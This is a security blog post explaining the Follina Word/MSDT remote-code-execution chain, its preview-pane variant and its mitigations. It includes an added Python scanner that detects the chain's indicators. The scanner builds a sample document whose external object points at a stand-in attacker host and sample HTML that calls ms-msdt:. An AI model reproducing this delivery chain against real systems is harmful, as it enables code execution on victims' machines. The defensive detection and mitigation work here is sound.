FOLLINA EXPLOIT - MSDT PROTOCOL VULNERABILITY (PATCHED)

MichaelK.eth
Partnership Director at Wallet Guard

A severe zero-day vulnerability nicknamed Follina (tracked as CVE-2022-30190) has been exploited in the wild through Microsoft Word documents; the first public sample surfaced on May 27th.

It lets an attacker run code on your computer with the privileges of the logged-in user, in some cases  WITHOUT  even opening the file.

This exploit is a chain of several steps stacked on top of each other. It is unfortunately easy to re-create, and early samples slipped past most anti-virus engines. Strap in as we try to explain.

The chain starts with Word's ability to pull in content from external sources (the same plumbing behind remote templates). The document's relationship list points at an HTML page on the attacker's server, and Word fetches and renders that page when the document is opened, running the JavaScript inside it.

Sound concerning? Don’t worry it gets way worse.

That JavaScript then navigates to an ms-msdt: URL. Windows hands such URLs to the Microsoft Support Diagnostic Tool, or MSDT (msdt.exe), which is how the chain gets from a web page to a PowerShell command.

MSDT is the engine behind the built-in Windows troubleshooters, and Microsoft Support may ask you to run it to collect diagnostics. It is not a remote-control tool like TeamViewer, but its troubleshooting packs run PowerShell under the hood, which is what makes it a useful target.

There's just one problem. The ms-msdt: URL lets the caller pass parameters to a troubleshooting pack, and MSDT did not sanitise them, so an attacker can smuggle a PowerShell expression into a parameter and have msdt.exe evaluate it. No password prompt or buffer overflow is involved; the code simply runs with the privileges of the logged-in user.
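Both halves of that chain leave an indicator you can check for offline: the document's relationship part names the external object, and the fetched HTML contains the ms-msdt: URI. The script below is an added example by this editor, not Wallet Guard's code or anything from the original thread. It builds a constructed .docx in memory (attacker.example is a placeholder host) and a constructed stand-in for the stage-two page, then flags each stage separately so a triage script can tell "suspicious" from "full chain".

```python
"""Flag the two on-disk indicators of the Follina (CVE-2022-30190) chain.

Stage 1: a .docx whose word/_rels/document.xml.rels carries an oleObject
         relationship with TargetMode="External" (Word fetches that URL).
Stage 2: the fetched HTML contains an ms-msdt: URI, which hands control to msdt.exe.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional

RELS_PART = "word/_rels/document.xml.rels"
PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"

# An ms-msdt: URI, read up to the quote that closes the string literal it sits in.
MSDT_URI = re.compile(r'ms-msdt:[^"\']*', re.IGNORECASE)


def external_ole_targets(docx_bytes: bytes) -> List[str]:
    """Return the Target of every external OLE relationship in the main document part.

    Ordinary documents carry external *hyperlink* relationships all the time, so only
    the oleObject type is flagged. An empty list means stage 1 is absent.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PART not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(RELS_PART))
    return [
        rel.get("Target", "")
        for rel in root.iter(PKG_NS + "Relationship")
        if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL_TYPE
    ]


def msdt_uris(html: str) -> List[str]:
    """Return every ms-msdt: URI found in fetched HTML (stage 2)."""
    return MSDT_URI.findall(html)


def scan(docx_bytes: bytes, fetched_html: str = "") -> dict:
    """Combine both stages into one verdict a triage script can act on."""
    targets = external_ole_targets(docx_bytes)
    uris = msdt_uris(fetched_html)
    if targets and uris:
        verdict = "follina-chain"      # document points at HTML that invokes msdt.exe
    elif targets:
        verdict = "suspicious"         # external OLE object alone is rare in benign files
    else:
        verdict = "clean"
    return {"external_ole_targets": targets, "msdt_uris": uris, "verdict": verdict}


def build_sample_docx(ole_target: Optional[str] = None) -> bytes:
    """Constructed sample: the smallest .docx-shaped zip that exercises the check.

    With ole_target=None it models a benign document (one external hyperlink only).
    """
    rels = [
        f'<Relationship Id="rId1" Type="{HYPERLINK_REL_TYPE}" '
        'Target="https://example.com/" TargetMode="External"/>'
    ]
    if ole_target is not None:
        rels.append(
            f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" '
            f'Target="{ole_target}" TargetMode="External"/>'
        )
    rels_xml = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        + "".join(rels)
        + "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")   # placeholder parts, unused by the check
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(RELS_PART, rels_xml)
    return buf.getvalue()


# Constructed stand-in for the stage-two page (not a real payload).
SAMPLE_HTML = """<html><body><script>
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force";
</script></body></html>"""


if __name__ == "__main__":
    hot = build_sample_docx("http://attacker.example/stage.html")
    print(scan(hot, SAMPLE_HTML))          # verdict: follina-chain
    print(scan(hot))                       # verdict: suspicious (HTML not fetched)
    print(scan(build_sample_docx()))       # verdict: clean
```

The scanner only reads the zip container, so it is safe to run on a suspected file; fetching the stage-two HTML yourself is optional and should be done from an isolated host. The .rtf variant carries the same external object reference in a different container and is not covered here.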

(If you were hit while running Word as an administrator, the attacker's code ran with administrator rights too. Rebuild that machine; it's beyond saving.)

Wanna know how it becomes a "0-click" exploit? Save the same document as .rtf and the Windows Explorer Preview Pane renders it, external object and all, the moment you select the file. Downloading alone does not trigger it, but previewing does, and Protected View never gets a say.

Previously, the advice for malicious Word docs was to never click Enable Content. This chain uses no macros, so that prompt never appears: a .docx that carries the mark-of-the-web still opens in Protected View, but once you click Enable Editing (or if the file has no mark) it fires INSTANTLY, and the .rtf preview path skips every prompt.

Why should web3 care?

Exploits like these are why it is CRITICALLY important not to store private keys in plain text on your file system. Second, we’ve seen similar attacks work in the past, and this exploit is even more serious as a “0-click” exploit.

The @arthur_0x attack displayed many similarities to this attack, detailed in our earlier thread.

The real world threat of this attack is that all .doc, .docx, and .rtf files need to be considered VULNERABLE at this point in time. This especially applies to VCs for example.

Again, this exploit allows for remote code execution so it is very serious.

Our recommendations:
- Discontinue use of Word for the time being  
- Utilize Google Docs  
- Disable the ms-msdt URL protocol (see the workarounds below)  
- Utilize PDF instead of vulnerable extension types

Microsoft's "Workarounds": when this was written Microsoft had published only a workaround rather than a fix, and seemed reluctant to even call it a zero-day (even though it absolutely was). The fix shipped in the June 14, 2022 security updates, hence the PATCHED tag above; once it is installed the workaround below can be reverted.

Here are your solutions:

1. If you run Microsoft Defender Antivirus with cloud-delivered protection and automatic sample submission turned on, updated signatures detect known samples; Defender for Endpoint customers can also enable the attack surface reduction rule that blocks Office applications from creating child processes. Detection lags new samples, so we still HIGHLY recommend solution 2  
2. Disable the ms-msdt URL protocol: back up the HKEY_CLASSES_ROOT\ms-msdt registry key (reg export), then delete it (reg delete), as described in the MSRC guidance linked below. Troubleshooters launched through that URL stop working until you re-import the backup, which you should do once the June 2022 update is installed

Sources:

Microsoft shares mitigation for Office zero-day exploited in attacks

Microsoft has shared mitigation measures to block attacks exploiting a newly discovered Microsoft Office zero-day flaw abused in the wild to execute malicious code remotely.

https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-mitigation-for-office-zero-day-exploited-in-attacks/

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

TL;DR:

DO NOT open .doc, .docx, and especially .rtf files from untrusted senders if you are on an unpatched Windows machine. Assume they are dangerous for the time being. Use the above solutions to keep yourself from becoming a victim. We unfortunately believe this threat could compromise many people.

Please share this with co-workers or anyone who could be a high profile target. You very well may prevent someone from getting hacked. This vulnerability is considered by many security researchers to be one of the worst Word exploits we’ve ever seen.

Published on
May 31, 2022